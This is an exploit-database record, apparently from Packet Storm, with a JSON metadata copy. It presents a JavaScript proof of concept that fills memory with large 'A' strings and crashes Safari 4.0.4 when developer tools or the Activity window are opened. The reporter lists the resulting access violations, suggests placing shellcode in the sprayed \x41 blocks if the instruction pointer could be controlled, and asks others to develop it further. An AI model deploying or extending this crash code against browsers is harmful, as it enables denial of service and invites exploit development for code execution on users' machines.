ID PACKETSTORM:85613 Type packetstorm Reporter systemx00 Modified 2010-01-26T00:00:00
Description
`The following piece of javascript will crash Safari nicely when triggered using one of the methods described below. With my limited knowledge I am unable to tell if it's exploitable or not. I therefore turn it over to "the internet". (tested on Safari 4.0.4, Win XP Pro SP3)
============================
<script>
var data = "A";
while(data.length<0x40000){
data += data;
}
data2 = new Array();
for (x=0; x<4000; x++){
data2[x] = data+data;
}
</script>
============================
The crash is not immediate, but there are actually two ways to trigger it and I believe they are separate problems.
The following will cause Safari to crash with Access violation reading [00000000].
* Window->Activity
Whereas these will crash Safari with Access violation writing to [BBADBEEF]
* Develop->Start Debugging Javascript
* Develop->Show Error Console (Unreliable)
* Develop->Show Web Inspector (Unreliable)
* (Right Click)->Inspect Element
I cant seem to affect any registers in an advantageous way but I do see several pointers to \x41 blocks on the stack. At least you could put shellcode in these and jump to them if you could control EIP. If anyone is able to do anything with this, please let me know.
`
{"type": "packetstorm", "published": "2010-01-26T00:00:00", "reporter": "systemx00", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "1f71def34099133a2b7c37cf412c4c5a"}, {"key": "modified", "hash": "d4b8d6bbbff9970a92f56234fd8eaaff"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "d4b8d6bbbff9970a92f56234fd8eaaff"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "e09e2e9651c3e4baf41e9b9c1080cb1d"}, {"key": "sourceData", "hash": "b5968dc23311ed6903b151f92ab7fee8"}, {"key": "sourceHref", "hash": "1486f2a39d2bf2bdcdaa550d55064d13"}, {"key": "title", "hash": "83bb1cf3affd5185bbee0e8bcdd0f096"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "bulletinFamily": "exploit", "cvss": {"vector": "NONE", "score": 0.0}, "sourceData": "`The following piece of javascript will crash Safari nicely when triggered using one of the methods described below. With my limited knowledge I am unable to tell if it's exploitable or not. I therefore turn it over to \"the internet\". (tested on Safari 4.0.4, Win XP Pro SP3) \n \n============================ \n \n<script> \nvar data = \"A\"; \nwhile(data.length<0x40000){ \ndata += data; \n} \ndata2 = new Array(); \nfor (x=0; x<4000; x++){ \ndata2[x] = data+data; \n} \n</script> \n \n============================ \n \nThe crash is not immediate, but there are actually two ways to trigger it and I believe they are separate problems. \n \nThe following will cause Safari to crash with \u0093Access violation reading [00000000]\u0094. \n \n* Window->Activity \n \nWhereas these will crash Safari with \u0093Access violation writing to [BBADBEEF]\u0094 \n \n* Develop->Start Debugging Javascript \n* Develop->Show Error Console (Unreliable) \n* Develop->Show Web Inspector (Unreliable) \n* (Right Click)->Inspect Element \n \nI can\u0092t seem to affect any registers in an advantageous way but I do see several pointers to \\x41 blocks on the stack. At least you could put shellcode in these and jump to them if you could control EIP. If anyone is able to do anything with this, please let me know. \n`\n", "viewCount": 0, "history": [], "lastseen": "2016-11-03T10:21:27", "objectVersion": "1.2", "href": "https://packetstormsecurity.com/files/85613/Safari-4.0.4-Crash-Proof-Of-Concept.html", "sourceHref": "https://packetstormsecurity.com/files/download/85613/safari404-dos.txt", "title": "Safari 4.0.4 Crash Proof Of Concept", "enchantments": {"score": {"vector": "NONE", "value": 5.0}, "vulnersScore": 5.0}, "references": [], "id": "PACKETSTORM:85613", "hash": "40d1b284771262e55988baf405fb9c6742bc8596a3420f6280f8ef0b2da4ef1d", "edition": 1, "cvelist": [], "modified": "2010-01-26T00:00:00", "description": ""}
